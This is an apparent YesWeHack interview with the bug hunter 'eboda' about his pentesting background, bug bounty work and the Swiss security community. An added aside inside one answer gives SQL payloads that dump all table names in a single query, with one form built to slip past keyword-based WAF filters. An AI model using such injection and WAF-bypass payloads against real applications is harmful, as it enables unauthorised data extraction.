YESWEHACK PROPHILE ON EBODA

December 11, 2019



┌▄──────────────────────────────────────────────────────────────────────▄┐
├■▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄■[ YESWEHACK PROPHILE ON EBODA ]■▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄■┤
├■──────────────────────────────────────────────────────────────────────■┤
├■▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀■┤
└▀──────────────────────────────────────────────────────────────────────▀┘
Wed, 11 Dec 2019 12:04:26 +0100 (CET)
╔══════════════════════════════════ WHOIS ═══════════════════════════════╗
║              Handle: eboda                                             ║
║       Handle origin: first name + last name (i'm very creative :>)     ║
║                       or maybe: 'adobe'[::-1], who knows...            ║
║    Age of your body: 29                                                ║
║         Produced in: Germany                                           ║
║                Urlz: https://bugscale.ch / @eboda_                     ║
║           Computers: Just got the new Thinkpad X1 extreme              ║
║                      (I am part of the cult worshipping                ║
║                       the Thinkpad nipple)                             ║
║         Superpowers: I can fly                                         ║
║  Life in a sentence: Eat Sleep Pwn Repeat (höhö)                       ║
╚════════════════════════════════════════════════════════════════════════╝

QUOTES
╔════════════════════════════════════════════════════════════════════════╗
║ Any man who must say "I am king" is no true king at all                ║
╚════════════════════════════════════════════════════════════════════════╝

ARMORY
╔════════════════════════════════════════════════════════════════════════╗
║ Mostly just Burp                                                       ║
║  I do not do any automated testing or crazy recon, so I don't use many ║
║ other specific tools.                                                  ║
╚════════════════════════════════════════════════════════════════════════╝

▀▄█▓▒░ Hello, what's your background?:
│  ───────────────────────────────────────────────────────────────────
└─  Hi! Professionally I was working as a pentester in Switzerland
    before starting to do bug hunting and research full-time.
    Less professionally, I used to play a lot of CTFs with my team Eat
    Sleep Pwn Repeat.


▀▄█▓▒░ How did you come to Bug Bounty ?
│  ───────────────────────────────────────────────────────────────────
└─  I did a bit of bug bounty hunting on and off a few years back.
    This year I quit my pentesting job and decided to pursue bug hunting
    as a full-time career. Now that it's up to me to choose targets to
    work on, I can spend all my time doing cool research on targets
    I personally am interested in or that use some cool tech :)


▀▄█▓▒░  You have practised on other BB platforms; what are the pros & cons,
│   from your experience on those platforms? / What are your expectations?
│  ───────────────────────────────────────────────────────────────────
└─  I am active on multiple platforms because it allows me to reach
    more targets. When it comes to choosing a program to work on I am
    quite nit-picky, so the more choice the better!

    Some things I'm looking for in a program:
    - Great payout (obviously, who are we kidding...)
    - Well defined scope. I don't like recon at all, so I prefer
    to be given a small list of applications to pwn
    - Does it have source code available? HUGE plus
    - Responsive and fair team. Can't really know that before your
    first reports

    My expectations of programs are pretty straightforward. I took the
    time and effort to test your application and (hopefully) report a
    bug, in return I expect fair treatment according to the rules you
    have published :)

    Fool me once shame on you, fool me twice shame on me. If you try
    to pull some tricks I will just move on to another target.

    As to BB platforms themselves, it is very important for me that the
    communication is efficient. It's just so much more pleasant to report
    bugs when you have professional triagers who understand what you
    are talking about and can intervene if you face problems with
    programs.


▀▄█▓▒░  Apart from Bug Bounty you seem to collaborate on a lot of hacker
│   events, what is your feeling on how the community is evolving?
│  ───────────────────────────────────────────────────────────────────
└─  Recently, together with some friends we have created a company
    called Bugscale to participate in bug bounties and do security
    research in general. It allows us to collaborate on our work
    efficiently, since we all chill in the same office.

    In Switzerland the BB community is still in its infancy, as there are
    not many BB programs and you can probably count the hunters living
    from it on one hand. As far as we know, we are the first company
    in Switzerland to actually make a living off of Bug Bounties.

    This year has seen enormous change for us though. Not only did
    YesWeHack create a subsidiary in Switzerland, but additionally BB
    programs are becoming more mainstream with conferences dedicating
    their theme to BB (see Swiss Cyber Storm for example)
    and Swiss companies actively trying to launch their BB programs.

    The future is definitely bright for us and especially in Switzerland
    the community will evolve immensely in the upcoming years!


▀▄█▓▒░  What was your first computer?
│  ───────────────────────────────────────────────────────────────────
└─  My first computer was mostly used to play CS1.6 and Warcraft 3 :D
    Didn't do much hacking back then...


▀▄█▓▒░  Do you remember your first successful exploitation?
│  ───────────────────────────────────────────────────────────────────
└─  Not really to be honest... I guess it wasn't worth remembering :D
    When I was younger I was very much into something I would describe as
    SQL injection "competitions". Basically, someone would post a
    website with a SQLi vuln and a WAF and the challenge was to dump
    all table names with a single query for example. You would end up
    with these huge SQL queries that bypass the WAF, concat results
    into variables and then dump those. It was kind of the thing that
    got me interested in security in the first place (that and CTFs).
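
    The single-query table dump described in the answer above, as an added
    example that is not part of the interview: a constructed MySQL/MariaDB
    schema (the `shop` database and its tables are made up) and two one-query
    forms, the plain GROUP_CONCAT and the user-variable version that builds the
    same list without ever naming the aggregate a naive WAF keyword rule would
    match. The derived-table evaluation order that makes the variable trick
    accumulate is an assumption about MySQL 5.x / MariaDB behaviour; other
    engines may not evaluate it that way.

```sql
-- Added example, not from the interview. Constructed schema; engine assumed
-- to be MySQL 5.x or MariaDB (user-variable accumulation in a derived table).
CREATE DATABASE IF NOT EXISTS shop;
USE shop;
CREATE TABLE IF NOT EXISTS users   (id INT PRIMARY KEY, name VARCHAR(32));
CREATE TABLE IF NOT EXISTS orders  (id INT PRIMARY KEY, user_id INT);
CREATE TABLE IF NOT EXISTS coupons (id INT PRIMARY KEY, code VARCHAR(16));

-- 1) The straightforward one-query dump: aggregate every table name of the
--    current database into a single string. A filter that blocks the token
--    "group_concat" stops this payload outright. The result is capped at
--    group_concat_max_len bytes (1024 by default), so long schemas get cut.
SELECT GROUP_CONCAT(table_name SEPARATOR ',') AS tables_csv
  FROM information_schema.tables
 WHERE table_schema = DATABASE();

-- 2) The "concat results into variables" form: @t is reset in the first
--    derived table, then appended to once per row while the second derived
--    table is materialised. The outer SELECT reads the variable back out
--    after that walk, so one row carries the whole list. No GROUP_CONCAT,
--    so a keyword-only WAF rule does not fire; a rule that looks for user
--    variable assignment (":=" or "@") still would.
SELECT @t AS tables_csv
  FROM (SELECT @t := '') AS init,
       (SELECT @t := CONCAT(@t, table_name, ',')
          FROM information_schema.tables
         WHERE table_schema = DATABASE()) AS walk
 LIMIT 1;
```

    Both statements read only information_schema, so they run with any
    account that can see the schema; the point of the competition payloads
    was that either one fits into a single injected SELECT where the
    application only echoes one row back.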


▀▄█▓▒░  What keeps you going / What turns you down?
│  ───────────────────────────────────────────────────────────────────
└─  The thrill of finding a cool vuln and writing an exploit for it.

    Doing things I don't enjoy turns me down (who would have thought :D).
    In the BB context this might include things like recon or writing
    reports :>>


▀▄█▓▒░  Is there a life AFK?
│  ───────────────────────────────────────────────────────────────────
└─  No of course not! jk... I have relocated to beautiful Switzerland
    some time ago, so there is no shortage of AFK life outside in
    the mountains.
    Depending on the season, I like to hike, ski or fly with my
    paraglider :)
    Also I'm into CS:GO, but that's technically not AFK I guess :D


▀▄█▓▒░  What is the future?
│  ───────────────────────────────────────────────────────────────────
└─  In Europe and Switzerland specifically I think we will see a sharp
    increase in companies adopting bug bounty programs. With YesWeHack
    being in Switzerland itself now, it will make it easier for
    companies to overcome initial hesitation or uncertainty regarding
    bug bounties.

    In any case, there will always be bugs, so in one way or another
    we will be able to keep busy ;)


--------[ EOF